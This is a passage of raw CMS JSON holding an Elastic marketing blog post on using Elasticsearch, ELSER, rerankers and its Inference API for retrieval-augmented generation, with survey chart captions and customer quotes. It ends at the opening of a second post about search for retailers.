12pt;\"\u003e\u003cstrong\u003echatbots\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. But only 11% have successfully implemented these use cases into production environments.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThere are several factors getting in their way:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eModel deployment and management:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Choosing the right model requires experimentation and rapid iteration. Deploying LLMs for generative AI applications is time-consuming and complex with a steep learning curve for many organizations.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eLegal and compliance concerns:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e These concerns are especially important when dealing with sensitive data and can be a barrier to model adoption.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eScaling:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Domain specific data is crucial for LLMs to understand context and generate accurate outputs. Retrieving that as your data scales requires equally scalable support for the workloads that generate vector embeddings, increasing the demand for memory and computational resources rapidly. With vast data sets, context windows are large and costly to pass to an LLM, and more context does not necessarily mean more relevance. Only a robust platform of tools can shape the context and balance the tradeoffs between relevance and scale to achieve a viable future proof architecture for innovation.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs46a7b662fbc0b8e7"}}},{"image":{"image":{"uid":"bltf9cb2e300af8acc0","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-03-21T19:08:39.137Z","created_by":"bltb6c155cd84fc0c1a","file_size":"94301","filename":"survey-1.png","parent_uid":null,"tags":[],"title":"survey-1.png","updated_at":"2024-03-21T19:08:39.137Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-04-02T15:00:00.575Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf9cb2e300af8acc0/65fc85b7d4e0c00c8f294a26/survey-1.png"},"_metadata":{"uid":"cs2c8029a1e9a40861"},"caption_l10n":"Chart: Where does your organization expect to spend the most time and resources when building generative AI use cases?","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs926bd6a6dee10f1d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDevelopers seek a reliable, scalable, and cost-effective way to build generative AI applications and a platform that simplifies implementation and the LLM selection process.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs55a28420b1569886"}}},{"image":{"image":{"uid":"blt25be443f3858d9e9","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-03-21T19:08:47.856Z","created_by":"bltb6c155cd84fc0c1a","file_size":"71042","filename":"survey-2.png","parent_uid":null,"tags":[],"title":"survey-2.png","updated_at":"2024-03-21T19:08:47.856Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-04-02T15:00:00.979Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt25be443f3858d9e9/65fc85bf039fdd73a9339eb7/survey-2.png"},"_metadata":{"uid":"cs3edd89a6de3727d0"},"caption_l10n":"Chart: What are your organization’s top considerations when selecting a vector search engine?","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0ae51fb18f77c0b6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eElastic is consistently delivering solutions to these developer concerns with a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/modern-search-workflows-generative-ai-apps\"\u003e\u003cspan style='font-size: 12pt;'\u003erapid pace of innovation\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to support generative AI use cases.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e"},{"title_l10n":"Roll out generative AI experiences fast and at scale","_metadata":{"uid":"cs1e52bc949ac25459"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch is the most downloaded vector database in the market, and Elastic’s deep association with the Lucene community has enabled us to design and deliver search innovations to our customers faster. Elasticsearch is now powered by \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elastic-search-8-13-0\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLucene 9.10\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, helping customers achieve speed and scale with generative AI. With 9.10, among other speed boosts, users are seeing significant \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/articles/multi-graph-vector-search\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003equery latency improvements\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e on multi-segment indices. And that’s just the start, there’s \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/articles/vector-similarity-computations-ludicrous-speed\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003emore speed\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to come.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1f51878406532a4d"}}},{"quotes":{"quote_l10n":"We’re using Elastic as a vector database because of its inherent flexibility, scalability, and reliability. Elastic continually elevates the game by rapidly delivering new features that support Machine Learning and generative AI.","_metadata":{"uid":"cs3d08600b168345f3"},"quote_author_l10n":"Peter O'Connor, Engineering Manager of Platform Engineering, Stack Overflow","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs77ee4ae8bd540302"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo quickly implement and scale RAG workloads, the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/machine-learning/current/ml-nlp-elser.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Learned Sparse EncodeR (ELSER)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e — generally available — is an easy to deploy, optimized, late interaction machine learning (ML) model for semantic search. ELSER delivers contextually relevant search results without requiring fine tuning and offers developers a built-in trusted solution, saving you the time and complexity of model selection, deployment, and management.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eELSER elevates search relevance without a cost to speed — when Consensus upgraded its \u003c/span\u003e\u003ca href=\"https://consensus.app/home/blog/introducing-consensus-2-0/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eacademic research platform\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e powered by Elastic, using ELSER, it \u003c/span\u003e\u003ca href=\"https://www.elastic.co/customers/consensus\"\u003e\u003cspan style='font-size: 12pt;'\u003ecut search latency by 75%\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e with improved accuracy.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen you pair ELSER with the E5 embedding model, you can easily apply multilingual vector search. Our \u003c/span\u003e\u003ca href=\"https://huggingface.co/elastic/multilingual-e5-small-optimized\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eoptimized artifact of E5\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e is tailored specifically for Elasticsearch deployments. Multilingual search is also available by uploading multilingual models or integrating with Elastic’s Inference API (for example, Cohere's multilingual model embeddings). These advancements accelerate \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/articles/retrieval-augmented-generation-rag\"\u003e\u003cspan style='font-size: 12pt;'\u003eretrieval augmented generation (RAG)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e further, making Elastic critical infrastructure for scaling the innovative generative AI experiences you build.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic is also focused on scaling these experiences efficiently. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/articles/scalar-quantization-101\"\u003e\u003cspan style='font-size: 12pt;'\u003eScalar quantization\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, which came with our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.12/release-highlights.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e8.12 release\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, is a game-changer for vector storage. Large vector expansions can lead to slower searches. But this compression technique dramatically \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/articles/scalar-quantization-in-lucene\"\u003e\u003cspan style='font-size: 12pt;'\u003eslashes memory requirements by fourfold\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and helps pack in more vectors, and at higher scales, has a negligible impact on recall. It doubles vector search speeds used in RAG without sacrificing accuracy. The result? A leaner, faster system that trims infrastructure costs at scale.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs19c6af71ba446ff0"}}},{"quotes":{"quote_l10n":"Search is critical for elevating Udemy’s user experience — matching users to relevant educational content, which is why Elastic has been a long-term partner of ours. We’ve used Elastic as our vector database since upgrading to Elastic Cloud last year, and it has opened up new opportunities for our business. We’ve seen increased query speed and resource efficiency as we’ve scaled vector search across our innovative education solutions.","_metadata":{"uid":"csd47037313ac2d778"},"quote_author_l10n":"Software Engineering Team, Udemy","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"The most relevant search engine for RAG","_metadata":{"uid":"cs07129d42d21b8c5d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRelevance is the key to the best generative AI experiences. Using ELSER for semantic search and BM25 for textual search are excellent first steps for retrieving relevant documents as \u003c/span\u003e\u003ca href=\"https://www.elastic.co/customers/market-research\"\u003e\u003cspan style='font-size: 12pt;'\u003econtext for LLMs\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Large context windows can be further refined using reranking tools that are now part of the Elastic Stack. Rerankers apply powerful ML models to fine-tune your search results and bring the most relevant results to the top based on user preferences and signals. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.13/learning-to-rank.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eLearning to Rank (LTR)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e is also now native to the Elasticsearch Platform. This is powerful for RAG use cases, which rely on feeding the most relevant results to an LLM as context.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eImplementation is further simplified through the Inference API and third-party providers like Cohere. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/welcome-to-elastic/current/new.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eUpgrade to our latest release\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to test the impact that rerankers can have on relevance.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThese approaches not only enhance search accuracy (\u003c/span\u003e\u003ca href=\"https://www.elastic.co/customers/consensus\"\u003e\u003cspan style='font-size: 12pt;'\u003eby 30%, in the case of Consensus\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e), but also help you achieve quick results, refining relevance for RAG and efficiently managing ML workstreams.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Making model selection and swapping simple","_metadata":{"uid":"cscff10ea20d9f8c10"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.elastic.co/what-is/large-language-models\"\u003e\u003cspan style='font-size: 12pt;'\u003eModel\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e selection can feel like searching for a needle in a haystack. In fact, our developer survey highlighted that one of the top five generative AI efforts across organizations is integrating with LLMs. This dilemma goes beyond choosing open versus closed source LLMs for a use case — it extends to accuracy, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/data-security\"\u003e\u003cspan style='font-size: 12pt;'\u003edata security\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/articles/domain-specific-generative-ai-pre-training-fine-tuning-rag\"\u003e\u003cspan style='font-size: 12pt;'\u003edomain-specificity\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, and quickly adapting to the changing LLM ecosystem. Developers need a straightforward workflow for trying new models and swapping them in and out.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic supports transformer and foundational models through its open platform, vector database, and search engine. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elastic-search-8-11-0\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Learned Sparse EncodeR (ELSER)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e is a reliable starting point for accelerating RAG implementations.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAdditionally, Elastic’s \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/master/semantic-search-inference.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eInference API\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e streamlines code and multi-cloud inference management for developers. Whether you use ELSER or embeddings from OpenAI (the most evaluated and used model among developers), Hugging Face, Cohere, or others for RAG workloads, one API call ensures clean code for managing hybrid inference deployment. With the Inference API, a wide range of models is easily accessible, so you can find the right fit. Easy integration with domain-specific natural language processing (NLP) and generative AI models streamlines model management, freeing up your time to focus on AI innovation.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs85387d36553987b0"}}},{"image":{"image":{"uid":"bltc230cc34dd0c7d3d","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-03-21T19:08:54.627Z","created_by":"bltb6c155cd84fc0c1a","file_size":"102789","filename":"survey-3.png","parent_uid":null,"tags":[],"title":"survey-3.png","updated_at":"2024-03-21T19:08:54.627Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-04-02T15:00:00.788Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc230cc34dd0c7d3d/65fc85c6fc8631fba0d73547/survey-3.png"},"_metadata":{"uid":"cs0f74b48455aeb28d"},"caption_l10n":"Chart: What of these embedding models has your organization used, evaluated, or has plans to evaluate?","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"image":{"image":{"uid":"blt5b691e69ae49066b","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-03-21T19:09:01.064Z","created_by":"bltb6c155cd84fc0c1a","file_size":"70800","filename":"survey-4.png","parent_uid":null,"tags":[],"title":"survey-4.png","updated_at":"2024-03-21T19:09:01.064Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-04-02T15:00:00.532Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5b691e69ae49066b/65fc85cd5caa4b32c360da98/survey-4.png"},"_metadata":{"uid":"cs843d12679aace1a5"},"caption_l10n":"Chart: What types of models does your organization use or expect to use in the future?","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Stronger together: A great experience with integrations","_metadata":{"uid":"cs1ec67ff10f76db0a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eDevelopers can also host diverse transformer models, including \u003c/span\u003e\u003ca href=\"https://www.docker.elastic.co/r/eland/eland:latest\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003epublic and private Hugging Face models\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. While Elasticsearch serves as a versatile vector database for the entire ecosystem, developers who prefer tools like \u003c/span\u003e\u003ca href=\"https://integrations.langchain.com/vectorstores\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLangChain\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and \u003c/span\u003e\u003ca href=\"https://gpt-index.readthedocs.io/en/stable/examples/vector_stores/ElasticsearchIndexDemo.html\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLlamaIndex\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e can use our integrations to quickly spin up production-ready generative AI apps using \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elasticsearch-langchain-production-ready-rag-templates\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLangChain Templates\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. Elastic's open platform sets you up to quickly adapt, experiment, and accelerate generative AI projects. Elastic was also recently added as a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/azure-openai-on-your-data-elasticsearch-vector-database\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ethird party vector database for On Your Data\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, a new service to build conversational copilots. Another good example is Elastic’s collaboration with the Cohere team behind the scenes to make Elastic a great vector database for \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elasticsearch-cohere-embeddings-support\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCohere embeddings\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGenerative AI is reshaping every organization, and Elastic is here to support the transformation. For developers, the keys to successful generative AI implementations are continuous learning (have you seen \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Search Labs\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e yet?) and rapidly adapting to the changing AI landscape.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs6329f9946c0ece7b"}}},{"quotes":{"quote_l10n":"When you combine the accuracy and speed of Elastic, and the power of Google Cloud, you can build a very stable and cost-efficient search platform that also delivers a delightful experience for the user.","_metadata":{"uid":"cs0c8e19331c9d7598"},"quote_author_l10n":"Sujith Joseph, Principal Enterprise Search \u0026 Cloud Architect, \u003ca href=\"https://www.elastic.co/customers/cisco\"\u003eCisco Systems\u003c/a\u003e","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"Try it out!","_metadata":{"uid":"csc84666d22cea54ba"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRead about these capabilities and more in the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/welcome-to-elastic/current/new.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Search release notes\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eExisting Elastic Cloud customers can access many of these features directly from the \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Cloud console\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. Not using Elastic Cloud? \u003c/span\u003e\u003ca href=\"https://www.elastic.co/cloud/generative-ai-trial-overview\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eStart a free trial\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eTry the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/esre/current/index.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch Relevance Engine\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, our suite of developer tools for building AI search apps.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"","_metadata":{"uid":"cs4bae50d0d4b3c165"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs094dfa2711635206"}}}],"publish_date":"2024-04-02","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Search powered AI and developer tools built for speed and scale","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt284682f193d93481","ACL":{},"created_at":"2023-11-06T20:07:36.694Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-ml-models","label_l10n":"AI/ML models","tags":[],"title":"AI/ML models","updated_at":"2023-11-06T20:07:36.694Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:37.071Z","user":"blt06083bb707628f5c"}},{"title":"Machine learning","label_l10n":"Machine learning","keyword":"machine-learning","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt65b9df038275be61","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:38:34.860Z","updated_at":"2020-06-17T03:38:46.799Z","_content_type_uid":"tags_topic","ACL":{},"_version":2,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:38:34.860Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-01T17:16:32.546Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","_version":2,"locale":"en-us","uid":"blt9085022a5c6c87e9","ACL":{},"created_at":"2023-11-06T20:41:57.778Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"large-language-models","label_l10n":"Large language models","tags":[],"title":"Large language models","updated_at":"2023-11-06T20:42:13.486Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:28.432Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltcae229c3da82fe5e","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-03-21T18:46:01.840Z","created_by":"bltb6c155cd84fc0c1a","file_size":"65949","filename":"gen-ai-launch-blog-720x420.jpg","parent_uid":null,"tags":[],"title":"gen-ai-launch-blog-720x420.jpg","updated_at":"2024-03-21T18:46:01.840Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-04-02T15:00:00.992Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltcae229c3da82fe5e/65fc8069edb2c74f0537400f/gen-ai-launch-blog-720x420.jpg"},"title":"Accelerating generative AI experiences","title_l10n":"Accelerating generative AI experiences","updated_at":"2025-02-06T02:35:48.613Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-generative-ai-experiences","publish_details":{"time":"2025-02-06T02:35:57.620Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltfe1c32c3e3a33cf6","_version":12,"locale":"en-us","ACL":{},"abstract_l10n":"With ESRE, retailers can enhance their search capabilities to deliver more accurate and relevant results to their customers and employees, while ensuring sensitive data remains protected.","author":["blt9b0dc3587c08e259"],"category":["bltc17514bfdbc519df"],"created_at":"2023-07-07T14:34:16.562Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csa7aee2ed4fbb6cf7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(14, 16, 26);font-size: 12pt;\"\u003e\u003ca href=\"https://www.elastic.co/what-is/generative-ai\" target=\"_self\"\u003eGenerative AI (GAI)\u003c/a\u003e, powered by models like OpenAI’s ChatGPT, is rapidly gaining attention in the retail industry for its potential to revolutionize customer experience and drive innovation. The technology has the ability to improve every corner of the retail industry, from tailored \u003c/span\u003e\u003ca href=\"https://www.elastic.co/enterprise-search/ecommerce\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eecommerce search\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(14, 16, 26);font-size: 12pt;\"\u003e and modernized \u003c/span\u003e\u003ca href=\"https://www.elastic.co/enterprise-search/customer-support\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecustomer support\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(14, 